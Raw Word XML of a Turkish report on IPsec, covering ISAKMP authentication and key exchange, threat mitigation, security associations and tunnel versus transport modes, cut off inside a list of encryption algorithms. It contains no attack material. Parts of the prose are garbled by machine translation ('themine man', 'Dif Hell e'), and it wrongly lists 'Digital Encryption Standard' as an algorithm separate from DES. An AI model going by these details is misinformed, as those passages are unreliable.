        <w:t>4. Tehdit azaltma</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İletişimin diğer ucunda varlığın kimliğini doğrulamak, güvenli bir iletişim oturumu kurmanın ilk adımıdır. Kimlik doğrulama olmadan, bir işletmenin kimliğine güvenmek mümkün değildir ve geçerli bir ID erişim kontrolü olmadan anlamsızdır. İzinsiz bir sistemle iletişimi güvenceye almak için ne değer var? ISAKMP, tüm ISAKMP değişimleri için güçlü bir kimlik doğrulama oluşturmak için ortak anahtar dijital imzaların kullanılmasını zorunlu kılar (örneğin, DSS, RSA). Standart belirli bir algoritma belirtmez. Genel anahtar şifrelemesi, paylaşılan sırları ve oturum anahtarlarını dağıtmanın çok etkili, esnek ve ölçeklenebilir bir yoludur. Ancak, tamamen etkili olması için, açık anahtarların belirli bir işletmeye bağlanmasının bir yolu olmalıdır. Daha büyük uygulamalarda, bu işlev bir Sertifika Yetkilisi (CA) gibi güvenilir bir üçüncü taraf (TTP) tarafından sağlanır. Küçük uygulamalar manuel olarak yapılandırılmış tuşları kullanmayı seçebilir. ISAKMP, güvenilir üçüncü şahıslarla iletişim kurmak için kullanılan protokolleri tanımlamaz.</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 xml:space="preserve">Anahtar teslimi, rastgele anahtarların oluşturulmasını ve bu anahtarların katılımcı kuruluşlara taşınmasını kapsar. Bir RSA açık anahtar sisteminde, anahtar aktarımı, oturum anahtarını alıcının açık anahtarıyla şifreleyerek gerçekleştirilir. Şifreli oturum anahtarı daha sonra, özel anahtarla şifresini çözen alıcı sistemine gönderilir. Dif Hell e – Hellman sisteminde, alıcının genel anahtarı, paylaşılan bir gizli anahtar oluşturmak için gönderenin özel anahtar bilgileriyle birleştirilir. Bu anahtar, oturum </w:t>
      </w:r>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>anahtarı olarak veya rastgele oluşturulmuş ikinci bir oturum anahtarının taşınması için kullanılabilir. ISAKMP kapsamında bu anahtar değişimlerinin güçlü kimlik doğrulaması kullanılarak yapılması gerekir. ISAKMP belirli bir anahtar değişim protokolü belirtmemektedir, ancak Oakley’nin standart olacağı anlaşılmaktadır. Güvenlik birliği oluşturma ve yönetme, bağlantı görüşmesinin iki aşamasına yayılmıştır. İlk aşama, iki uç nokta SA yöneticisi arasında bir güvenlik ilişkisi kurar. İkinci aşama, o oturum için seçilen güvenlik protokolleri için güvenlik ilişkilerini kurar. Birinci aşama, yöneticiler ve bitiş noktaları arasındaki güveni oluşturur; ikinci aşama, iki son nokta arasındaki güvendir. İkinci aşama tamamlandığında, SA yöneticisinin bağlantıya başka bir katkısı yoktur.</w:t>
      </w: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ISAKMP, hizmet reddi, kaçırma ve themine man saldırıları gibi tehditlerle mücadele mekanizmalarını bütünleştirir. Yönetici servisi, CPU-yoğun herhangi bir işlem yapmadan önce talep eden sisteme tıkanma önleyici bir simge (çerez) gönderir. Yönetici bu tanımlama bilgisine bir cevap alamazsa, isteğin geçersiz olduğunu ve reddettiğini varsayar. Bu kesinlikle kapsamlı bir tıkanma önleme koruması olmasa da, en yaygın baskın saldırılara karşı oldukça etkilidir. Tıkanmayı önleyici mekanizma, yeniden yönlendirme saldırılarını tespit etmek için de kullanışlıdır. Her oturum kurulumu sırasında birden fazla çerez gönderildiği için, veri akışını farklı bir uç noktaya yönlendirmeye yönelik herhangi bir girişim algılanır. ISAKMP, kimlik doğrulama işlemini ve SA / anahtar değiştirme işlemini tek bir veri akışına bağlar. Bu, veri akışının engellenmesine veya değiştirilmesine dayanan saldırıları (örneğin, kaçırma, them-iniddle) tamamen etkisiz hale getirir. Veri akışındaki herhangi bir kesinti veya değişiklik yönetici tarafından algılanacak ve işlem devam edecektir. ISAKMP ayrıca veri silme işlemlerini tespit etmek için dahili bir durum makinesi kullanır, böylece kısmi değiş tokuşlara dayalı SA'ların kurulmamasını sağlar. Son bir anti-tehdit olarak, ISAKMP tüm anormal işlemler için günlük kaydı ve bildirim gereklilikleri belirtmekte ve on-line hata bildiriminin kullanımını sınırlamaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00EC731D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC731D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>BULGULAR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">Güvenlik İlişkilendirmesi (Security Associattion, SA)kavram , IP  güvenlik  mimari-sinin temelidir. Bir SA, paketleri kimin gönderdiği, paketlerin nereye gittiği ve yük </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olarak ne taşındığı hakkında veri paketlerine uygulanması gereken güvenlik tedbirle-</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rini tan mlar. Bir SA taraf ndan sunulan güvenlik hizmetleri kümesi, güvenlik proto-</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 xml:space="preserve">kolüne, bu protokolün seçeneklerine ve SA’nın hangi çalışma şeklinde işletildiğine </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008463B4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>dayanI</w:t>
      </w:r>
      <w:r w:rsidRPr="008463B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>r.  SA’lar  için,  güvenlik  yöneticisi  taraf ndan  ve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">rilen  güvenlik  politikalarna </w:t>
      </w:r>
      <w:r w:rsidRPr="008463B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">dayalı olarak, IPSec’in bir ya da daha fazla güvenlik hizmeti kullanılacağı zaman, </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 xml:space="preserve">haberleşen uçlar arasında dinamik uzlaşı gerçekleştirilebilir. Başka bir yaklaşım, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>nadir olarak kullanı</w:t>
      </w:r>
      <w:r w:rsidRPr="008463B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>sa da, SA’lar statik olarak tanImlanması</w:t>
      </w:r>
      <w:r w:rsidRPr="008463B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>ı</w:t>
      </w:r>
      <w:r w:rsidRPr="008463B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">Kaynak IP adresinin SA’yı tanımlamak için kullanılmadığına dikkat edilmelidir. Bu, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008463B4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>SA’n n, iki uç veya geçit arası</w:t>
      </w:r>
      <w:r w:rsidRPr="008463B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">nda tek bir yönde veri iletimi için yapılmış bir hizmet </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lastRenderedPageBreak/>
        <w:t xml:space="preserve">anlaşması olmasından kaynaklanır. Bunun sonucu olarak eğer iki uç arasında IPSec </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008463B4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008463B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">kullanılarak iki yönlü veri iletimi gerçekleştirilecekse, her biri bir yön için, iki adet </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>SA’nın tanı</w:t>
      </w:r>
      <w:r w:rsidRPr="008463B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>mlanmas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>ı</w:t>
      </w:r>
      <w:r w:rsidRPr="008463B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">  gerekir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:keepNext/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B53F2B0" wp14:editId="0E9241AD">
            <wp:extent cx="4107180" cy="2549236"/>
            <wp:effectExtent l="0" t="0" r="762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912" t="11972" r="34328" b="24409"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4130981" cy="2564009"/>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F36496" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ResimYazs"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F36496">
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Şekil </w:t>
      </w:r>
      <w:r w:rsidRPr="00F36496">
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00F36496">
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Şekil \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00F36496">
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F36496">
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F36496">
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Taşıma ve Tünel Şekilleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F36496" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F36496">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">SA iki çalışma şeklinde işletilir; taşıma ve tünel çalışma şekli. Taşıma çalışma şekli </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F36496" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F36496">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>birincil olarak üst katman (TCP ve UDP gibi) protokollerinin  korunmas  için tasarlanmıştır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F36496">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F36496">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Tünel çalışma şeklinde ise bir IP paketi başka bir IP paketinin taşıma verisi olmaktadır. Bu yöntemde içerdeki IP paketi, başlığı ile birlikte kriptolanmakta, dış başlık ise bu kriptolanmış paketin ağ üzerinde, yönlendirilmiş olduğu ağa ulaştırıl-masını sağlamaktadır. Uçlar hem taşıma ve hem detünel çalışma şekillerinde işlenilebilirken, güvenlik geçitleri sadece tünel çalışma şeklindeyapılandırılabilirler (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F36496">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Geçit uç rolünü üstlendiğinde her iki çalışma şeklini de destekleyebilir</w:t>
      </w:r>
      <w:r w:rsidRPr="00F36496">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007124EF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F36496">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IPSec Çatısı Altında Kullanılan Şifreleme Algoritmaları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007124EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007124EF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="007124EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Güçlü” olarak tanımlanan birçok şifreleme algoritması mevcuttur fakat IPSec çatısı altında kullanılmak üzere bunlardan sadece birkaçı resmen deklare edilmiştir: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007124EF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007124EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">DES, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007124EF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007124EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Digital Encryption Standard,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007124EF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007124EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3DES,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
